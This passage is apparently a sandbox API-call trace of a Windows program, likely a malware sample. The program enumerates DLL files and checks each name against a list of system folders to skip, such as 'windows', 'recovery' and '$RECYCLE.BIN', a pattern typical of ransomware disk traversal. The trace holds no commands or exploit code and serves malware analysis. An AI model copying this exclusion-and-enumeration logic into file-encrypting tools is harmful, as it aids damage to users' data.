hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5015594, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x253ea8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SG.DLL", cAlternateFileName="")) returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2=".") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="..") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="...") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="windows") returned -1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="recovery") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="perflogs") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="documents and settings") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="system volume information") returned -1 [0143.878] lstrcmpiW (lpString1="SG.DLL", lpString2="msocache") returned 1 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SG.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SG.DLL", cchWideChar=6, lpMultiByteStr=0x345ef40, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SG.DLL", lpUsedDefaultChar=0x0) returned 6 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SG.DLL", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0143.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SG.DLL", cchWideChar=6, lpMultiByteStr=0x345ef10, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SG.DLL", lpUsedDefaultChar=0x0) returned 6 [0143.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0143.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0143.878] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5015594, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x54ca8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SHAPNUM.DLL", cAlternateFileName="")) returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2=".") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="..") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="...") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="windows") returned -1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="recovery") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="perflogs") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="documents and settings") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="system volume information") returned -1 [0143.878] lstrcmpiW (lpString1="SHAPNUM.DLL", lpString2="msocache") returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAPNUM.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAPNUM.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAPNUM.DLL", lpUsedDefaultChar=0x0) returned 11 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0143.879] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x708b8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SHAREPOINTPROVIDER.DLL", cAlternateFileName="SHAREP~1.DLL")) returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2=".") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="..") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="...") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="windows") returned -1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="recovery") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="perflogs") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="documents and settings") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="system volume information") returned -1 [0143.879] lstrcmpiW (lpString1="SHAREPOINTPROVIDER.DLL", lpString2="msocache") returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAREPOINTPROVIDER.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAREPOINTPROVIDER.DLL", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAREPOINTPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 22 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAREPOINTPROVIDER.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0143.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHAREPOINTPROVIDER.DLL", cchWideChar=22, lpMultiByteStr=0x241290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHAREPOINTPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 22 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0143.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.880] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa3658, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SignalRClient.dll", cAlternateFileName="SIGNAL~1.DLL")) returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2=".") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="..") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="...") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="windows") returned -1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="recovery") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="perflogs") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="documents and settings") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="system volume information") returned -1 [0143.880] lstrcmpiW (lpString1="SignalRClient.dll", lpString2="msocache") returned 1 [0143.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignalRClient.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignalRClient.dll", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignalRClient.dll", lpUsedDefaultChar=0x0) returned 17 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignalRClient.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0143.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignalRClient.dll", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignalRClient.dll", lpUsedDefaultChar=0x0) returned 17 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0143.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.880] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23598a6d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bad8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SOA.DLL", cAlternateFileName="")) returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2=".") returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="..") returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="...") returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="windows") returned -1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="recovery") returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="perflogs") returned 1 [0143.880] lstrcmpiW (lpString1="SOA.DLL", lpString2="documents and settings") returned 1 [0143.881] lstrcmpiW (lpString1="SOA.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.881] lstrcmpiW (lpString1="SOA.DLL", lpString2="system volume information") returned -1 [0143.881] lstrcmpiW (lpString1="SOA.DLL", lpString2="msocache") returned 1 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOA.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOA.DLL", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOA.DLL", lpUsedDefaultChar=0x0) returned 7 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOA.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOA.DLL", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOA.DLL", lpUsedDefaultChar=0x0) returned 7 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0143.881] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca850099, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca850099, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb4af440, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11ec60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SOCIALCONNECTOR.DLL", cAlternateFileName="SOCIAL~1.DLL")) returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2=".") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="..") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="...") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="windows") returned -1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="recovery") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="perflogs") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="documents and settings") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="system volume information") returned -1 [0143.881] lstrcmpiW (lpString1="SOCIALCONNECTOR.DLL", lpString2="msocache") returned 1 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTOR.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTOR.DLL", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALCONNECTOR.DLL", lpUsedDefaultChar=0x0) returned 19 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTOR.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0143.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTOR.DLL", cchWideChar=19, lpMultiByteStr=0x2413a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALCONNECTOR.DLL", lpUsedDefaultChar=0x0) returned 19 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0143.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0143.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0143.885] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x73ee48, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc080, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SOCIALPROVIDER.DLL", cAlternateFileName="SOCIAL~2.DLL")) returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2=".") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="..") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="...") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="windows") returned -1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="recovery") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="perflogs") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="documents and settings") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="system volume information") returned -1 [0143.885] lstrcmpiW (lpString1="SOCIALPROVIDER.DLL", lpString2="msocache") returned 1 [0143.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALPROVIDER.DLL", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0143.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALPROVIDER.DLL", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 18 [0143.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALPROVIDER.DLL", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0143.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0143.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALPROVIDER.DLL", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALPROVIDER.DLL", lpUsedDefaultChar=0x0) returned 18 [0143.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0143.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0143.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0143.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.885] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5015594, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x50cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SOLUTILS.DLL", cAlternateFileName="")) returned 1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2=".") returned 1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="..") returned 1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="...") returned 1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="windows") returned -1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="recovery") returned 1 [0143.885] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="perflogs") returned 1 [0143.886] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="documents and settings") returned 1 [0143.886] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.886] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="system volume information") returned -1 [0143.886] lstrcmpiW (lpString1="SOLUTILS.DLL", lpString2="msocache") returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLUTILS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLUTILS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLUTILS.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0143.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLUTILS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLUTILS.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLUTILS.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 